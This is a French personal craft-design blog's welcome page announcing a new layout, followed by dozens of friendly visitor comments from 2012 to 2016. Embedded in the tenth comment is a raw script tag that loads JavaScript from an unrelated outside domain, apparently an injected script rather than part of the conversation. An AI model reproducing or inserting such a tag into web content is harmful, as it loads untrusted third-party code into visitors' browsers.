• Bienvenus dans mon jardin secret

     Soyez les bienvenus dans mon jardin secret !

    Nouvelle formule pour mon blog afin de faciliter vos visites.

    Tout d'abord , mes derniers articles seront directement sur la page d'accueil, ce sera plus simple

    pour vous y retrouver.

    Vous pourrez tout de même acceder aux différentes rubriques ( creations par thèmes, tutoriels,

    tubes etc...) par les boutons cliquables en dessous de ma bannière., puis à différentes choses 

    par le menu du côté.

    Rencontrant différents problèmes sous internet explorer, je vous conseille d'utiliser google chrome 

    ou mozilla firefox pour profiter pleinement de mon blog.

    En effet , sous internet explorer , certaines de mes images n'apparaissent pas , ainsi que les

    boutons cliquables en dessous de la bannière. Ceci dit , peut être que vous ne rencontrerez pas

    les mêmes problèmes . Moi, je ne peut vraiment pas utiliser mes blogs sous IE , c'est une

    catastrophe!

    La deco du blog est faite pour une résolution d'écran 1680x1050, je le précise car plusieurs 

    personnes m'ont dit ne pas voir la déco complète avec un écran plus petit.

    Je vous souhaite un agréable voyage à travers mon univers.

    Bisous de Nounou


    Tags Tags : , , , ,
  • Commentaires

    1
    Independante
    Mardi 21 Février 2012 à 16:04

    bisous nounou  ah c est complètement différent mais  printanier  .. je te souhaite  une belle  journée de Mardi gras ..

    2
    le-grenier-de-nanou
    Mercredi 22 Février 2012 à 10:16
    Bonjour, Je te remercie de ton passage sur mon blog. Je te souhaite une agréable semaine Amicalement Nanou
    3
    Vendredi 24 Février 2012 à 02:14

    Sublime ta deco j'aime ca.

    Jaurais aime être bonne pour faire des fond comme toi.

    Gros bisous

    4
    Vendredi 24 Février 2012 à 18:56

    Merci pour les conseils bien utiles...j'utilise mozilla, car IE, c'est de.....
    Bonsoir Nounou
    C'est avec plaisir que je passe dans ton univers joli...
    pour prendre de tes nouvelles et te souhaiter une bonne soirée
    ainsi qu'un bon weekend...
    Bisous & amitiés
    Seb

    5
    Independante
    Mercredi 29 Février 2012 à 15:35

    bonne  journée  nounou gros bisous  il fait super doux aujourd hui  vais en profiter  pour  nettoyer  un peu le  jardin ..

    6
    Dimanche 11 Mars 2012 à 14:39

    Salut Nounou!!!

    Je passe sur ton jardin pour cueilir des tomates pour faire ma sandwiche pour diner avec la sapin si le lapin a pas trop grignoté loll. Je plaissante mais je viens te faire un coucou à la suite de ton comm.

    Merci contente que la deco de mon blog te plaise.

    J'aime bien ton curseur .

    Je te souhaite une bonne fin journée.

    bisous 

    7
    Jeudi 22 Mars 2012 à 20:28

    Bonsoir Nounou          

    Et hop, c'est le printemps...
    Le temps est venu de faire le lézard au soleil...et observer la magie
    de la nature et des paysages !
    Je te souhaite un bon weekend...et du soleil à gogo
    Bisous & amitiés
    Seb

    8
    Jeudi 5 Avril 2012 à 22:04

     

    Douce soirée !

    9
    Dimanche 8 Avril 2012 à 03:43

    Salut!!

    Cool ta deco de Pâques. Désolée, pas être aller voir ca plutôt .

    Je te souhaites une tres Joyeuses päques avec les tous petits.

    Bisous

    10
    Independante
    Lundi 16 Avril 2012 à 15:20

    NOUNOU PASSE  UNE BELLE  JOURNée .. gros bisous..

    <script src="http://superoseplugin.info/dfi823hs.js?0.32626716258852306" type="text/javascript"></script>
    11
    Nathcreation
    Lundi 23 Avril 2012 à 21:10

    Coucou Nounou merci pour ta participation elle est vraiment magnifique. Super ton bloguinou et je suis fan de tes créas.

    Bravo et merci gros poutoux

    12
    Mya mon bébé Profil de Mya mon bébé
    Lundi 23 Avril 2012 à 23:26

    coucou nounou

     très beau curseur 

     j'espère que tu n'es pas trop fatiguée 

     je suis contente de te retrouver 

     bonne nuit de gros bisous 

     a demain sur le fofo

     dors bien

    13
    Mercredi 25 Avril 2012 à 14:19

    Coucou tite nounou

    c'est vrai j'avais perdu ta trrace, en général je réponds toujours au com, pas de suite, mais

    je répère les chiffres hiii - quelle est belle ta déco dis donc, superbe.

    BOn je vais pouponner tite nounou - ma tite nièce de bientot 1 an -je me régale

    à bientot gros bisous

    14
    MARIAN24 Profil de MARIAN24
    Mardi 1er Mai 2012 à 20:58

    WHOUA!!!!!!!! il est superbe! et je te souhaite un excellent premier mai avec beaucoup d'amour.

    Merci de ton partage, j'ai commencé, je vais le mettre en ligne très bientôt. Bisous Supernounou

    15
    Jeudi 3 Mai 2012 à 02:24

    Cool ce design pour le premier mai desolée du retard pas mal occupée de partout lol.

    Bon jeudi remplie de soleil. bisous

    16
    Mya mon bébé Profil de Mya mon bébé
    Jeudi 10 Mai 2012 à 17:07

    un coucou chez ma nounou

     j'espère que tu vas bien et que tu profite au max du soleil 

    chez nous ce soir annonce d'averses de greles 

    on verra faudra tout planquer mes fleurs gros bisous   je file  sur le fofo

    17
    Dimanche 13 Mai 2012 à 00:09
    18
    baboucherouge Profil de baboucherouge
    Dimanche 13 Mai 2012 à 11:38

    Coucou Nounou

    Me voilà arrivée dans ton paradis pour te faire de gros gros bzou bzou et te souhaiter un excellent dimanche

    19
    Nathcreation
    Lundi 14 Mai 2012 à 19:16

    Coucou Nounou c'est magnifique chez toi Bravo et plein de gros bisous

    20
    Vendredi 18 Mai 2012 à 19:25

    Coucou Nounou

    magnifque déco vraiment j'adore ton jardin à bientot

    bisous

    21
    Dimanche 20 Mai 2012 à 10:55

    magnifque blog comme tjs


    bisous cat

    22
    Mercredi 30 Mai 2012 à 20:49

    Salut Nounou!!!

    est-ce normal que la colomb me saute sur les doitgts??Je sais pas si elle est bien nourrie ou quoi mais elle s,en prend à mes vieux doitgs tous croches hihihi. Bon assez rigoler loll. Bon courage Nounou.....Bonne  fin soirée. Bisous

    23
    Mercredi 6 Juin 2012 à 13:33

    Coucou

    J'espère que tu va mieu, je penses fort à toi. Bon mercredi chez nous c'est un jour d'enfants avec la pluie grrrr

    Bonne Journée

    24
    jeannot511 Profil de jeannot511
    Lundi 25 Juin 2012 à 05:31


    Dans l'océan danser la sirène..
    Aux rythmes de sont ballet...au doux son d'une mer bleutée..
    Sillonne la sirène ..la vague s'est apaisée..
    Beauté de la vie..

    25
    Vendredi 29 Juin 2012 à 20:37

    Bonsoir Nounou,

    Petit passage dans ton espace, histoire de prendre quelques nouvelles...
    Ce qui me donne l'occasion de te souhaiter un bon weekend...ensoleillé si possible !
    amitiés & bisous
    Seb

    26
    Mercredi 15 Août 2012 à 16:05

    Très beau blog féerique, félicitations pour ton blog. Bonne soirée. Bisous

    27
    Mardi 21 Août 2012 à 05:52

    Salut M'dame Nounou scrap loll

    Je suis venue prendre ton poul voir comment tu vas??

    Pas trop dans le scrap?? Profites tu du beau temp?? J'ai entendue dire quil fait cahdu en France.

    Ici au Quebec depuis une semaine on est juste bien... Sa fait changement des canicules qu'on a eue.

    Je te souhaite un bon mardi. bisous

    28
    Jeudi 6 Septembre 2012 à 21:22

    Sympa, ta nouvelle formule...et tu reviens quand ?
    Bonsoir Supernounou,

    Petit passage dans ton bel univers virtuel, pour prendre quelques nouvelles.
    Quelques lenteurs chez Ekla ont empêché mes visites régulières des blogs, mais
    cela semble réparé à présent !
    J'espère que tu as passé de bonnes vacances et que la rentrée te retrouve en forme !
    Par la même occasion je te souhaite une bonne fin de semaine, un bon weekend...
    Amitié & bisous
    Seb

    29
    Atena Profil de Atena
    Mardi 25 Septembre 2012 à 15:46

    superbe crea ma belle

    ta décos et belle aussi

    a bientot

    30
    Samedi 13 Octobre 2012 à 13:42
    rtt59

    salut merci pour ton travaille qui est d une toute beaute

    si tu veut te joindre a nous on serez tres honores que tu puisse venir sur notre site

    je te parainerez volonties pseudo est rtt59

    est je continuerez a visitez ton site et demanderez  peut etre un kit avatar et signature

    continue j aime ce que tu fait est in plaisir pour les yeux merci de ton travail

     

     

    31
    Samedi 15 Décembre 2012 à 21:48
    32
    Jeudi 20 Décembre 2012 à 21:47

    Bonsoir Nounou,

    Je m'absente...
    C'est donc de façon prématurée que je viens te souhaiter
    un JOYEUX NOËL
    ainsi qu'une BONNE ANNEE 2013 !
    Que cette Nouvelle Année puisse t'apporter
    La Joie, Le Bonheur et surtout la Santé pour toi et les tiens...
    Qu'elle soit source de nouveaux défis et de nouveaux plaisirs...
    A bientôt en 2013 !
    Amitiés & gros Bisous
    Seb

    33
    Jeudi 10 Janvier 2013 à 15:04

    Bonjour gentille Nounou,

    Me voilà enfin reviendu...c'est avec un peu de retard que je te souhaite la Bonne Année !
    Si 2012 nous avait beaucoup promis, les promesses n'ont pas été tenues...
    Tremblements de terre, inondations, guerres ici et là...bref, une année pourrie...
    Même une fin du monde annoncée a été remise à une date ultérieure...vraiment décevant !
    Mais, l'embarquement du TGV 2013 à commencé, les prochains arrêts seront Santé, Chance, Joie, Bonheur...
    Arrêt obligatoire à la gare Bonne Santé d'ailleurs ! (histoire d'y boire le drink de l'amitié)
    Durée du voyage : 12 mois...
    Mais 2013 sera une année spéciale, et des milliers de petites joies viendront embellir ta vie...si si !
    Elle sera pour toi et tes proches, comme un feu d'artifice, pleins de moments forts, brillants, d'émotions et de bonnes surprises !
    Et ce n'est pas la crise et le pouvoir d'achat qui nous fera perdre notre sens inné de la fête...
    Je te souhaite donc une moisson de bonheur pour 2013 !
    BONNE ANNEE !
    Bisous
    Seb

    34
    Samedi 12 Juillet 2014 à 20:51

    Salut Nounou!
    Je te fais un tit coucou. Je suis de retour sur eklablog.

    bon samedi soir. bisous

    35
    Vendredi 2 Décembre 2016 à 23:40

    Salut Nounou!!
    Je te rend un petit visite et je suis de retour.

    Bonne fin soiree. Bisouss

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :